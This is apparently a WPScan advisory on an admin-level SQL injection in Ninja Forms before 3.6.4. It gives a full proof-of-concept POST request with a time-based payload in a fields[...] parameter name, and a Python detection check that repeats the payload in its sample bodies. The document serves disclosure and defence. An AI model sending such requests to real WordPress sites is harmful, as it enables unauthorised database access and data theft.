wpvulndb JrXnm WPVDB-ID:55008A42-EB56-436C-BCE0-10EE616D0495
History: Oct 26, 2021 - 12:00 a.m.

Ninja Forms < 3.6.4 - Admin+ SQL Injection

2021-10-26 00:00:00
JrXnm
wpscan.com
EPSS: 0.001 (Low), Percentile: 37.8%

The plugin does not escape the keys of the fields POST parameter, which could allow high-privilege users to perform SQL injection attacks.

PoC

POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 972
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

_wpnonce=b71ca03531&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D106%26action%3Dedit&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=nf_sub&original_post_status=publish&referredby=http%3A%2F%2F192.168.223.130%2Fwp-admin%2Fedit.php%3Fpost_status%3Dall%26post_type%3Dnf_sub%26form_id%3D2&_wp_original_http_referer=http%3A%2F%2F192.168.223.130%2Fwp-admin%2Fedit.php%3Fpost_status%3Dall%26post_type%3Dnf_sub%26form_id%3D2&post_ID=106&meta-box-order-nonce=0a34e97291&closedpostboxesnonce=88cbb362ee&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=10&jj=20&aa=2021&hh=15&mn=58&ss=47&hidden_mm=10&cur_mm=10&hidden_jj=20&cur_jj=20&hidden_aa=2021&cur_aa=2021&hidden_hh=15&cur_hh=16&hidden_mn=58&cur_mn=47&original_publish=Update&nf_edit_sub=1&save=Update&post_name=106&fields%5B5%5D=0&fields%5B5%5D=on&fields%5B6%5D=0&fields%5B6%5D=on&fields[' or sleep(1)-- -]=xxx
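
The injection point in this request is a parameter name, not a value, so filters that only inspect values will not see it. The following Python check is an added example (not part of the advisory or the plugin's code) that flags submission-edit requests whose fields[...] keys are not numeric; the function names, the numeric-key rule and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate keys are numeric field IDs, as in fields[5] and
# fields[6] in the request on this page; an empty subscript ([]) is tolerated.
ALLOWED_KEY = re.compile(r"[0-9]{0,10}")
SUBSCRIPT = re.compile(r"\[([^\]]*)\]")


def suspicious_field_keys(body: str) -> list[str]:
    """Return decoded fields[...] parameter names whose keys are not numeric."""
    flagged = []
    # parse_qsl percent-decodes names, so fields%5B5%5D and fields[5] are
    # treated identically, as they are by the server.
    for name, _value in parse_qsl(body, keep_blank_values=True):
        if not name.startswith("fields["):
            continue
        keys = SUBSCRIPT.findall(name[len("fields"):])
        # No closed subscript at all, or any non-numeric subscript, is flagged.
        if not keys or any(not ALLOWED_KEY.fullmatch(k) for k in keys):
            flagged.append(name)
    return flagged


def inspect_edit_request(path: str, body: str) -> list[str]:
    """Apply the key check only to Ninja Forms submission edits (post_type=nf_sub)."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    if not path.endswith("/wp-admin/post.php") or params.get("post_type") != "nf_sub":
        return []
    return suspicious_field_keys(body)


# Constructed sample bodies, shortened from the request shape shown above.
BENIGN = "action=editpost&post_type=nf_sub&nf_edit_sub=1&fields%5B5%5D=on&fields%5B6%5D=0"
SUSPECT = "action=editpost&post_type=nf_sub&nf_edit_sub=1&fields%5B5%5D=on&fields[' or sleep(1)-- -]=xxx"
ENCODED = "action=editpost&post_type=nf_sub&fields%5B%27+or+sleep%281%29--+-%5D=xxx"

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspect", SUSPECT), ("encoded", ENCODED)):
        print(label, inspect_edit_request("/wp-admin/post.php", body))
```

The same rule can run as a log-review filter over captured request bodies; the fix itself is to upgrade to a release at or above 3.6.4, since the advisory lists versions below it as affected.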

CPE
Name: ninja-forms, Operator: lt, Version: 3.6.4
